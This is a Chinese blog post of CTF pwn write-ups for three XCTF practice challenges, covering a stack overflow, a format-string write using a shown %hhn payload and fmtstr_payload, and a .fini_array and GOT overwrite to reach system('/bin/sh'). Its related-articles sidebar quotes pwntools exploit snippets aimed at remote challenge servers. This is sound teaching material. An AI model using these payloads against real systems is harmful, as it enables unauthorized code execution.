xctf-pwn-“反应釜开关控制 & 实时数据监测 & greeting-150“

最新推荐文章于 2023-06-03 10:36:20 发布
最新推荐文章于 2023-06-03 10:36:20 发布
阅读量330 收藏 2
点赞数
分类专栏: 快乐学习pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/njh18790816639/article/details/119250147
版权

反应釜开关控制

该pwn题目逻辑较为简单。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
通过三次栈溢出,可以得到shell函数地址。
在这里插入图片描述
发现PIE保护没有开启,其实这里是直接可以栈溢出到shell函数的地址的,不必弄那么复杂!
在这里插入图片描述
这道题目的PIE应该是忘记开了,题目原本设计的目的是想让我们使用三次栈溢出来得到shell的。
分界线
这里我感觉应该不是这么简单的,所以我又去进行寻找资料,发现是XCTF 4th-CyberEarth里面的盲打题。意味着我们没有ELF文件,所以我们就没有办法来想这么简单的去做出来。

实时数据监测

发现什么保护都没有开启。
在这里插入图片描述
然后看一看代码。
在这里插入图片描述
关键是利用格式化字符串进行任意地址写,将key地址里面的数值进行覆盖。
在这里插入图片描述
偏移量应该是12,而key的地址为0x0804A048,需要将key的值覆盖为35795746即可。转换为发送数据为22 33 22 02。

\x22=34  		\x33=51  		\x22=34           \x02=2
18+16=34=0x22   34+17=51=0x33   51+239=290=0x122  290+224=514=0x202
数据在内存中是小端序%hhn会写入单字节
构造如下:
%18c%12$hhn%17c%13$hhn%239c%14$hhn%224c%15$hhn
也可以使用fmtstr_payload函数
payload = fmtstr_payload(12,{key_addr,35795746})

在这里插入图片描述

greeting-150

在这里插入图片描述
在这里插入图片描述
并且可以发现存在system函数。
在这里插入图片描述
这个时候我们可以先确认偏移量!
在这里插入图片描述
通过判断发现不存在栈溢出漏洞,也就是说我们只有一个格式化字符串漏洞,但是如果仅仅靠格式化字符串漏洞,可以达到一次的任意地址写,但是仅仅通过一次任意地址写,是达不到我们想要的地步,所以我们必须想办法将该格式化字符串漏洞可以多次利用!

大多数可执行文件是通过链接 libc 来进行编译的,因此 gcc 会将 glibc 初始化代码放入编译好的可执行文件和共享库中。
.init_array和 .fini_array 节(早期版本被称为 .ctors和 .dtors )中存放了指向初始化代码和终止代码的函数指针。
.init_array 函数指针会在 main() 函数调用之前触发。这就意味着,可以通过重写某个指向正确地址的指针来将控制流指向病毒或者寄生代码。
.fini_array 函数指针在 main() 函数执行完之后才被触发,在某些场景下这一点会非常有用。
例如,特定的堆溢出漏(如曾经的 http://phrack.org/issues/57/9.html )会允许攻击者在任意位置写4个字节,攻击者通常会使用一个指向 shellcode 地址的函数指针来重写.fini_array 函数指针。
对于大多数病毒或者恶意软件作者来说, .init_array 函数指针是最常被攻击的目标,因为它通常可以使得寄生代码在程序的其他部分执行之前就能够先运行。

在这里插入图片描述
此时我们利用一次任意地址写,覆盖.fini_array函数指针。然后可以进行覆盖strlen的got地址为system的plt地址。第二次main函数时就输入’/bin/sh’,调用strlen时候实际上调用的是system("/bin/sh");该函数。
在这里插入图片描述
利用该脚本可以得到权限!

四代机您发多少
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反应开关控制(xctf)
weixin_43868725的博客
05-24 728
0x0 程序保护和流程 保护: 流程: main() gets明显存在栈溢出。又在函数列表中找到了shell()函数。 0x1 利用过程 直接覆盖return的地址payload=0x208*‘a’+p64(0x4005F6) exp from pwn import * #sh=process('./a') sh=remote('124.126.19.106','53303') sh.recvuntil('>') payload=0x208*'a'+p64(0x4005F6) sh.sendli
1.反应开关控制
weixin_44864859的博客
07-27 365
1.反应开关控制 拿到这道题,ida分析之后感觉是有些奇怪的,因为题目就是简单的栈溢出,而且给了后门函数。所以就是简单的ret2text。 exp: from pwn import * context(log_level='debug',arch='amd64',os='linux') r = remote('220.249.52.133',37791) elf = ELF('./kaiguan') shell_addr = 0x04005F6 payload = 'A'*0x208 + p64(she
攻防世界 pwn——反应开关控制
CNS-Enterprise BCC-1701-J
06-03 296
攻防世界 做题练习
[XCTF-pwn] 37_xctf-4th-CyberEarth_play
weixin_52640415的博客
03-10 245
又买一个,实在是代码太我看不明白了。 解题思路: 用同一个用户登录两次,选择不同的攻击方式,直到成功。 成功后,输入名字的地方有溢出,在这里写入rop:泄露,修改got.puts为system,再调用puts(/bin/sh) 验证后的exp: from pwn import * ''' patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_i386/ld-2.23-i386-0ubuntu11.so pw...
greeting-150(xctf)
weixin_43868725的博客
08-10 669
0x0 程序保护和流程 保护: 流程: main() 存在一个明显的格式化字符串漏洞。 0x1 利用过程 1.格式化字符串漏洞的出现代表着只要有权限,就能完成任意地址写。而题目的保护是没有开启重定位表只读保护,所以可以修改函数的got表。所以可以修改一个参数由输入决定单参数函数的got表为sysytem函数的地址,这样就当输入**/bin/sh**的时候就可以完成getshell了。通过观察程序,决定修改strlen函数的got表。 2.由于需要二次输入,涉及到控制程序流程。而控制流程需要一个可执行的指
XCTF-HW-pipeline附件
最新发布
11-09
附件
【XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
【XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
【XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
【XCTF-RE】新手练习区-re1.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ugg9gy
攻防世界-pwn-实时数据监测
xxxsdd的博客
02-22 1092
1.ida查看代码 2.查看保护机制 什么都没有开 3.知识点 格式化字符串漏洞 例子 printf("aa%16$n") 32位程序时 会向栈地址为esp+15中的地址addr所指向的内存单元写入2 因为aa表示了两个字节所以向[addr]中 写入2 若想写入15 则可以利用 printf("a*15%16$n") or printf("15x%16$n") 来向栈地址为esp+15中的地...
攻防世界-web-ics-06--XCTF 4th-CyberEarth
Sea_Sand息禅
04-23 6265
进入index.php,发现可以传参,bp爆破,当id=2333时拿到flag
攻防世界 Pwn 实时数据监测
MrTreebook的博客
12-12 577
攻防世界 Pwn 实时数据监测1.题目下载地址2.checksec3.IDA4.格式化字符串漏洞的解法5.exp 1.题目下载地址 点击下载 2.checksec 什么保护都没开,估计是很简单的题 进IDA分析一下 3.IDA int locker() { int result; // eax char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s); if ( key == 35795
[攻防世界 pwn]——反应开关控制
Y_peak的博客
02-23 334
[攻防世界 pwn]——反应开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit from pwn import * p = remote("111.200.241.244",31931) payload='a' * (0x200 + 8)+p64(0x4005F6) p.sendlineafter('>',payload) p.interactive() ...
实时数据监测(xctf)
weixin_43868725的博客
05-24 848
0x0 程序保护和流程 保护: 流程: main() locker() imagemagic() 当key=35795746=0x2223322时调用system("/bin/sh"),在imagemagic()中又存在格式化字符串漏洞。所以只需要更改key的值即可。 0x1 利用过程 先确定偏移量。 偏移量为12。但是我们要向key的地址写入35795746=0x2223322,如果一次性写入35795746个字符的话输入缓冲区可能会溢出导致程序无法运行。所以我们选择单字符写入所以payloa
[攻防世界 pwn]——实时数据监测
Y_peak的博客
02-27 601
[攻防世界 pwn]——实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746,就好 写个小脚本在pwndbg中看看偏移 from pwn import * p = process('./pwn') gdb.attach(p, 'b *0x080484A7') #p = remote("111.200.241.244",48715) key_addr = 0x0804A048 p
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6523
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
攻防世界高手进阶区 ——反应开关控制
weixin_62675330的博客
02-11 461
攻防世界高手进阶区 ——反应开关控制 题目没什么信息。在这里插入图片描述 1.分析文件 运行一下,可能为栈溢出的题。 checkse 无栈溢出保护,无地址随机化,只有堆栈不可执行。 栈溢出可能性大。 ida64 int __cdecl main(int argc, const char **argv, const char **envp) { char s[64]; // [rsp+0h] [rbp-240h] BYREF char v5[512]; // [rsp+40h] [
guess-xsctf
07-28
- *1* [xctf攻防世界 REVERSE 高手进阶区 Guess-the-Number](https://blog.csdn.net/l8947943/article/details/124064262)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值